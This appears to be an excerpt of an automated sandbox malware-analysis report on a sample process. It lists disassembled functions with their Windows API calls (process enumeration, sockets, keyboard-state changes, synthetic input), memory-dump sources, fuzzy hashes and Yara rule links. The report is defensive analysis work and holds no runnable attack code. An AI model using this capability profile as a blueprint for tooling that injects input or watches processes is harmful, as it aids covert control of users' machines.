                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0283da2dcbd646389f5cd67d342bbd44dd4b1c6e9dc6b8b9508cfffd5d78358e
                                                                                                                                                  • Instruction ID: 3ac31511b6bb5b08df5f1873ad33db039cbdfbea04940ad1c5b09af4be59ba42
                                                                                                                                                  • Opcode Fuzzy Hash: 0283da2dcbd646389f5cd67d342bbd44dd4b1c6e9dc6b8b9508cfffd5d78358e
                                                                                                                                                  • Instruction Fuzzy Hash: 2051E9306087029BDB20AF7AD895BADB3F5AF06310F30891FF556D72A1DB7098C0AB15
                                                                                                                                                  Function 00C3F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00C3F526
                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00C3F534
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?,00000000,?), ref: 00C3F5F4
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C3F603
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2576544623-0
                                                                                                                                                  • Opcode ID: a8b786d77e255eb802bff41da2a90427eff62a26f79b0742127a5582a1e0fe95
                                                                                                                                                  • Instruction ID: fbd020a14ffd9b3f2bf2b10549153f78a3c2d24af5c8d7b4605fa3adc28cc4a5
                                                                                                                                                  • Opcode Fuzzy Hash: a8b786d77e255eb802bff41da2a90427eff62a26f79b0742127a5582a1e0fe95
                                                                                                                                                  • Instruction Fuzzy Hash: 8E517BB1514311AFD310EF24D886F6FB7E8EF94710F10496EF595972A1EB70AA04CB92
                                                                                                                                                  Function 00BE492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2782032738-0
                                                                                                                                                  • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                                                                                  • Instruction ID: 7505d158fe8735e875f4d21c7db11df919e7adb295099c22c9f40b455b0b394b
                                                                                                                                                  • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                                                                                  • Instruction Fuzzy Hash: 5C41E5356007869FDF288E6BC88496F77E5EF80360B2482FDE85597641D770DD408B44
                                                                                                                                                  Function 00C1A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C1A68A
                                                                                                                                                  • __itow.LIBCMT ref: 00C1A6BB
                                                                                                                                                    • Part of subcall function 00C1A90B: SendMessageW.USER32(?,0000113E,00000000,00000000,?,00000000,00000028,00000800,?,00000028,?,?,?,00000000), ref: 00C1A976
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?,?,0000110A,00000004,00000000), ref: 00C1A724
                                                                                                                                                  • __itow.LIBCMT ref: 00C1A77B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3379773720-0
                                                                                                                                                  • Opcode ID: 7f4bd03d32e48d97449ed8d4a032d58371f672463f6d3e4faab2e3c5df492d20
                                                                                                                                                  • Instruction ID: 0c428762551661332b16db0ae688f26cfcc8b6c6017f77285e28c07d0779dca4
                                                                                                                                                  • Opcode Fuzzy Hash: 7f4bd03d32e48d97449ed8d4a032d58371f672463f6d3e4faab2e3c5df492d20
                                                                                                                                                  • Instruction Fuzzy Hash: DE41B374A00208ABDF10DF54C855BEEBBF9EF45750F04046AF905A3391EB709A84DBA2
                                                                                                                                                  Function 00C37095 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #23.WSOCK32(00000002,00000002,00000011), ref: 00C370BC
                                                                                                                                                  • #111.WSOCK32(00000000), ref: 00C370CC
                                                                                                                                                    • Part of subcall function 00BC4D37: __itow.LIBCMT ref: 00BC4D62
                                                                                                                                                    • Part of subcall function 00BC4D37: __swprintf.LIBCMT ref: 00BC4DAC
                                                                                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C37130
                                                                                                                                                  • #111.WSOCK32(00000000), ref: 00C3713C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: #111$__itow__swprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3577594119-0
                                                                                                                                                  • Opcode ID: 2108ce22d87c3dd537a556e3d576263e2cc74898bf380a57f229d450cc3f9c85
                                                                                                                                                  • Instruction ID: 6a8248975e4d86c5699a12b8cf9331d46bba49078388d2487ed0a72fed637244
                                                                                                                                                  • Opcode Fuzzy Hash: 2108ce22d87c3dd537a556e3d576263e2cc74898bf380a57f229d450cc3f9c85
                                                                                                                                                  • Instruction Fuzzy Hash: E0419F756502006FE720AF24DC97F6E77E89B04B10F14859CFA59AF3C2DB709E408B91
                                                                                                                                                  Function 00C36B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C50980), ref: 00C36B92
                                                                                                                                                  • _strlen.LIBCMT ref: 00C36BC4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4218353326-0
                                                                                                                                                  • Opcode ID: 367d1b5c74bb6f3a9af9a83ecee31ab099d984c212d70d622f21f34323948951
                                                                                                                                                  • Instruction ID: ff41da53e17360f6271d36585b89b1c8f888943d84e937c1a72c3229260f9214
                                                                                                                                                  • Opcode Fuzzy Hash: 367d1b5c74bb6f3a9af9a83ecee31ab099d984c212d70d622f21f34323948951
                                                                                                                                                  • Instruction Fuzzy Hash: CE41A371610109BBCB14EB65DC95FAEB3E9EF54310F24C199F81A9B292DB30AE41DB90
                                                                                                                                                  Function 00C48E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C48F03
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                                  • Opcode ID: ef0f19019b36d5d91a048fa539cc0ba1219c12ae2da679991087e6d127b3e385
                                                                                                                                                  • Instruction ID: 686a6ce41cdfab53dc30ed1cde73192d8cae634664f681f0544f96a8d2dea570
                                                                                                                                                  • Opcode Fuzzy Hash: ef0f19019b36d5d91a048fa539cc0ba1219c12ae2da679991087e6d127b3e385
                                                                                                                                                  • Instruction Fuzzy Hash: 5731B234600108AEFF209A98CC85BAC37A6FB05320F644501FA21E61E1DF71EA9C9B51
                                                                                                                                                  Function 00C4B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ClientToScreen.USER32(?,?,?,?,?,?,?,?,?,00C4C6BC,?,?,?), ref: 00C4B1D2
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00C4B248
                                                                                                                                                  • PtInRect.USER32(?,?,00C4C6BC,?,?), ref: 00C4B258
                                                                                                                                                  • MessageBeep.USER32(00000000,?,?,?,?,00C4C6BC,?,?,?), ref: 00C4B2C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                                  • Opcode ID: 2164b932ff00bb42728663b2d63dfe845c8e8039cf03c0fc73ae0b001976e860
                                                                                                                                                  • Instruction ID: f8165df268a17f08e51ea68104d69dcb889c1f5bbdfbbac1189f685e3be5f370
                                                                                                                                                  • Opcode Fuzzy Hash: 2164b932ff00bb42728663b2d63dfe845c8e8039cf03c0fc73ae0b001976e860
                                                                                                                                                  • Instruction Fuzzy Hash: 66415A30A042199FDF21CF99C884BAD7BF5FB49311F2485A9E828EB261D770ED41DB50
                                                                                                                                                  Function 00C212D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C21326
                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C21342
                                                                                                                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001,00000000,?,00000001), ref: 00C213A8
                                                                                                                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C213FA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                  • Opcode ID: ab388bbdb79ac40440f8b6cd3e07afb62677c53bae16590c824b418a568c8de2
                                                                                                                                                  • Instruction ID: 9a16231d771c2a4f0d17d904b3146f93b46681e0735022d101824205432a75a5
                                                                                                                                                  • Opcode Fuzzy Hash: ab388bbdb79ac40440f8b6cd3e07afb62677c53bae16590c824b418a568c8de2
                                                                                                                                                  • Instruction Fuzzy Hash: E3314D70940328AEFF34C625AC057FD7BA6AB64310F1C421AF8A052DE1D3745B819B55
                                                                                                                                                  Function 00C21410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00C21465
                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C21481
                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?,?,00008000), ref: 00C214E0
                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00C21532
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                  • Opcode ID: 3e480350d573b833413d365aac24195e96fe7993d8e95d02cf297d20a04e6e02
                                                                                                                                                  • Instruction ID: 9679f9ee2b5ee8743ea37365a78fda78ea0b857f9601e45f4f5bc9e6b1fa3d24
                                                                                                                                                  • Opcode Fuzzy Hash: 3e480350d573b833413d365aac24195e96fe7993d8e95d02cf297d20a04e6e02
                                                                                                                                                  • Instruction Fuzzy Hash: 603180309403385EFF349A65AC047FEBB65ABA5310F5C436BFCA5529D1C3388B419B61
                                                                                                                                                  Function 00BF63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BF642B
                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00BF6459
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BF6487
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BF64BD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                  • Opcode ID: 59d85cb50b0924aef057d126821607c7b0d14b35d01e172d69fee3ac01ec7cba
                                                                                                                                                  • Instruction ID: c1294a53eec6fc984e82b7bc9357347949c804ff355856a5bd282c14381e773c
                                                                                                                                                  • Opcode Fuzzy Hash: 59d85cb50b0924aef057d126821607c7b0d14b35d01e172d69fee3ac01ec7cba
                                                                                                                                                  • Instruction Fuzzy Hash: 0F31B03160029AAFDB21AF65CC85BBA7BF5FF40320F2540A9ED6497291EB31EC54DB50
                                                                                                                                                  Function 00C4552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00C4553F
                                                                                                                                                    • Part of subcall function 00C23B34: GetWindowThreadProcessId.USER32(00000000,00000000,00000000,?,00C255C0), ref: 00C23B4E
                                                                                                                                                    • Part of subcall function 00C23B34: GetCurrentThreadId.KERNEL32(00000000,?,00C255C0), ref: 00C23B55
                                                                                                                                                    • Part of subcall function 00C23B34: AttachThreadInput.USER32(00000000,?,00C255C0), ref: 00C23B5C
                                                                                                                                                  • GetCaretPos.USER32(?), ref: 00C45550
                                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00C4558B
                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00C45591
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                                  • Opcode ID: 850d43a00713dff5a714f114c2657f2ad90c334cf56de561bc0523a0ed6e979c
                                                                                                                                                  • Instruction ID: b5ff6e9c019bc202db492b7517963e4ed56e3842445feb6e24d67aa556592ba6
                                                                                                                                                  • Opcode Fuzzy Hash: 850d43a00713dff5a714f114c2657f2ad90c334cf56de561bc0523a0ed6e979c
                                                                                                                                                  • Instruction Fuzzy Hash: 4B311071900108AFDB00EFB5D895EEFB7F9EF98304F10446AE515E7241EB75AE448BA0
                                                                                                                                                  Function 00C4CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1CE4,?), ref: 00BC29F3
                                                                                                                                                  • GetCursorPos.USER32(?,?,?,?,?,?,?,?,00BFBCEC,?,?,?,?,?), ref: 00C4CB7A
                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BFBCEC,?,?,?,?,?), ref: 00C4CB8F
                                                                                                                                                  • GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,00BFBCEC,?,?,?,?,?), ref: 00C4CBDC
                                                                                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BFBCEC,?,?,?), ref: 00C4CC16
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2864067406-0
                                                                                                                                                  • Opcode ID: df9fe9bb5b7464694da815c54fb3ea87643d372bbe53966121ec846f9cf9a3d5
                                                                                                                                                  • Instruction ID: 32b191d801e4357ae040c3ebc0a4424b91d0880c60418a98e8e93a70cf3922f1
                                                                                                                                                  • Opcode Fuzzy Hash: df9fe9bb5b7464694da815c54fb3ea87643d372bbe53966121ec846f9cf9a3d5
                                                                                                                                                  • Instruction Fuzzy Hash: ED319A34601118AFCB158F59CC89FBE7BA5FB09310F1440A9F915AB271D7319A50EFA0
                                                                                                                                                  Function 00BE0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __setmode.LIBCMT ref: 00BE0BE2
                                                                                                                                                    • Part of subcall function 00BD402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27E51,?,?,00000000), ref: 00BD4041
                                                                                                                                                    • Part of subcall function 00BD402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27E51,?,?,00000000,?,?), ref: 00BD4065
                                                                                                                                                  • _fprintf.LIBCMT ref: 00BE0C19
                                                                                                                                                  • OutputDebugStringW.KERNEL32(?), ref: 00C1694C
                                                                                                                                                    • Part of subcall function 00BE4CCA: _flsall.LIBCMT ref: 00BE4CE3
                                                                                                                                                  • __setmode.LIBCMT ref: 00BE0C4E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
